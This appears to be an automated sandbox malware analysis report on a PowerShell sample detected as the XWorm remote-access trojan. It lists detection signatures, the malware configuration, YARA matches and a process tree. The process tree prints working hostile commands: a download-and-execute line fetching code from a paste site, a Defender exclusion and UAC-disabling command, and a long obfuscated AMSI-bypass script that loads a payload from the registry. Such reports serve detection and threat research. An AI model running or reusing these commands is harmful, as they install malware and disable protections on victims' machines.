Edit tour

Windows Analysis Report
script.ps1

Overview

General Information

Sample name:	script.ps1
Analysis ID:	1632678
MD5:	f7907aaa36ecbdf6ea474650bea2b747
SHA1:	11356251ecc1dca11f6e372197d4d757dd6eb43d
SHA256:	30d852a6064a9f9e57981364edbee0c7a1fecc1d9681bb2a9255e3b13da0c67f
Tags:	ps1user-BastianHein
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains process injector

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found Tor onion address

Found suspicious powershell code related to unpacking or dynamic code loading

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Obfuscated command line found

Performs DNS queries to domains with low reputation

Powershell drops PE file

Sample uses string decryption to hide its real strings

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential WinAPI Calls Via CommandLine

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/linhgh7d | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 8096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7276 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

j3owB.exe (PID: 7468 cmdline: "C:\ProgramData\j3owB.exe" MD5: 02A326274F6FBC2C10002E6989F4571F)

NwhPywLp.exe (PID: 7496 cmdline: "C:\Users\user\AppData\Local\Temp\NwhPywLp.exe" MD5: F6515DF66DEBD922C1D9699648BC06BD)

SVrB5SO0.exe (PID: 7512 cmdline: "C:\ProgramData\SVrB5SO0.exe" MD5: 0D59300D31F0B41CC02411DEA2C43C0F)

cZp98.exe (PID: 8180 cmdline: "C:\ProgramData\cZp98.exe" MD5: B20E29F2B88234CDA8B95B43A4FEC8AA)

notepad.exe (PID: 7772 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\script.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)

svchost.exe (PID: 7996 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

powershell.exe (PID: 8164 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KHaJDxumDNco{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IrkchjYcpcIHrG,[Parameter(Position=1)][Type]$FKynkUloVt)$wzaPjwDXVrR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+'e'+''+[Char](99)+'t'+'e'+''+'d'+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e','Cl'+[Char](97)+'ss'+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+''+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+''+'s'+','+[Char](65)+''+'u'+'t'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$wzaPjwDXVrR.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+'i'+'a'+'l'+''+[Char](78)+'a'+[Char](109)+'e'+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+','+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$IrkchjYcpcIHrG).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$wzaPjwDXVrR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+'V'+'i'+'r'+''+'t'+'u'+[Char](97)+''+'l'+'',$FKynkUloVt,$IrkchjYcpcIHrG).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $wzaPjwDXVrR.CreateType();}$ZLkQxZedqjGHd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+''+'e'+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+'.'+''+'U'+'ns'+'a'+''+'f'+''+[Char](101)+''+[Char](78)+'ati'+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+'s'+'');$InAbAdJDZoirzm=$ZLkQxZedqjGHd.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+'S'+'ta'+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XnKYApPjMWcAPTVilEP=KHaJDxumDNco @([String])([IntPtr]);$qaRyIfPJOrGQGXGLuawmPN=KHaJDxumDNco @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ivWaVYZktkG=$ZLkQxZedqjGHd.GetMethod(''+[Char](71)+'et'+[Char](77)+'odu'+[Char](108)+''+'e'+''+[Char](72)+''+'a'+''+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'n'+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+'l')));$DFTpDBThbtAKah=$InAbAdJDZoirzm.Invoke($Null,@([Object]$ivWaVYZktkG,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+''+[Char](98)+'r'+[Char](97)+'r'+'y'+''+'A'+'')));$pZVRTGMNEOcumeLQw=$InAbAdJDZoirzm.Invoke($Null,@([Object]$ivWaVYZktkG,[Object]('V'+[Char](105)+''+'r'+'tu'+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$WEuPlWA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DFTpDBThbtAKah,$XnKYApPjMWcAPTVilEP).Invoke(''+'a'+'m'+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$ZzcKBPlSMhzEIWMhJ=$InAbAdJDZoirzm.Invoke($Null,@([Object]$WEuPlWA,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$NmfoTgyKCX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pZVRTGMNEOcumeLQw,$qaRyIfPJOrGQGXGLuawmPN).Invoke($ZzcKBPlSMhzEIWMhJ,[uint32]8,4,[ref]$NmfoTgyKCX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZzcKBPlSMhzEIWMhJ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pZVRTGMNEOcumeLQw,$qaRyIfPJOrGQGXGLuawmPN).Invoke($ZzcKBPlSMhzEIWMhJ,[uint32]8,0x20,[ref]$NmfoTgyKCX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'TW'+'A'+''+[Char](82)+'E').GetValue(''+[Char](115)+'v'+[Char](115)+''+'t'+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dllhost.exe (PID: 1156 cmdline: C:\Windows\System32\dllhost.exe /Processid:{ad169925-81d9-44d9-bcaf-9afe899a1c33} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 372 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 396 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 628 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1048 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1108 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1116 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1172 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1276 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1348 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1412 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1456 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1556 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1588 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1656 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1664 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1736 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1848 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1952 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1960 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1968 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1"], "Port": 49201, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
script.ps1	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\SVrB5SO0.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\SVrB5SO0.exe	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x524f:$str01: $VB$Local_Port 0x5240:$str02: $VB$Local_Host 0x5462:$str03: get_Jpeg 0x4f93:$str04: get_ServicePack 0x5ef2:$str05: Select * from AntivirusProduct 0x6014:$str06: PCRestart 0x6028:$str07: shutdown.exe /f /r /t 0 0x60c8:$str08: StopReport 0x609e:$str09: StopDDos 0x610e:$str10: sendPlugin 0x6150:$str11: OfflineKeylogger Not Enabled 0x62d6:$str12: -ExecutionPolicy Bypass -File " 0x640b:$str13: Content-length: 5235
C:\ProgramData\SVrB5SO0.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x64b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6553:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6668:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6326:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x62b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6353:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6468:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6126:$cnc4: POST / HTTP/1.1
00000003.00000002.1350767206.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.1350767206.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xdee:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe8b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xfa0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc5e:$cnc4: POST / HTTP/1.1
00000003.00000002.1350767206.0000000005225000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.1350767206.0000000005225000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5a85:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5b22:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5c37:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58f5:$cnc4: POST / HTTP/1.1
Process Memory Space: powershell.exe PID: 7616	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: notepad.exe PID: 7772	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7836	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7836	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: SVrB5SO0.exe PID: 7512	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: svchost.exe PID: 1172	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.0.SVrB5SO0.exe.b00000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
15.0.SVrB5SO0.exe.b00000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x524f:$str01: $VB$Local_Port 0x5240:$str02: $VB$Local_Host 0x5462:$str03: get_Jpeg 0x4f93:$str04: get_ServicePack 0x5ef2:$str05: Select * from AntivirusProduct 0x6014:$str06: PCRestart 0x6028:$str07: shutdown.exe /f /r /t 0 0x60c8:$str08: StopReport 0x609e:$str09: StopDDos 0x610e:$str10: sendPlugin 0x6150:$str11: OfflineKeylogger Not Enabled 0x62d6:$str12: -ExecutionPolicy Bypass -File " 0x640b:$str13: Content-length: 5235
15.0.SVrB5SO0.exe.b00000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x64b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6553:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6668:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6326:$cnc4: POST / HTTP/1.1

Other

Source	Rule	Description	Author	Strings
amsi32_7616.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_7836.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KHaJDxumDNco{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IrkchjYcpcIHrG,[Parameter(Position=1)][Type]$FKynkUloVt)$wzaPjwDXVrR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+'e'+''+[Char](99)+'t'+'e'+''+'d'+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e','Cl'+[Char](97)+'ss'+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+''+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+''+'s'+','+[Char](65)+''+'u'+'t'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$wzaPjwDXVrR.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+'i'+'a'+'l'+''+[Char](78)+'a'+[Char](109)+'e'+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+','+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$IrkchjYcpcIHrG).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$wzaPjwDXVrR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+'V'+'i'+'r'+''+'t'+'u'+[Char](97)+''+'l'+'',$FKynkUloVt,$IrkchjYcpcIHrG).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $wzaPjwDXVrR.CreateType();}$ZLkQxZedqjGHd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+''+'e'+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+'.'+''+'U'+'ns'+'a'+''+'f'+''+[Char](101)+''+[Char](78)+'ati'+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+'s'+'');$InAbAdJDZoirzm=$ZLkQxZedqjGHd.GetMethod(''+'G'+''+[Char](101)

Sigma detected: Potential WinAPI Calls Via CommandLine

Source: Process started

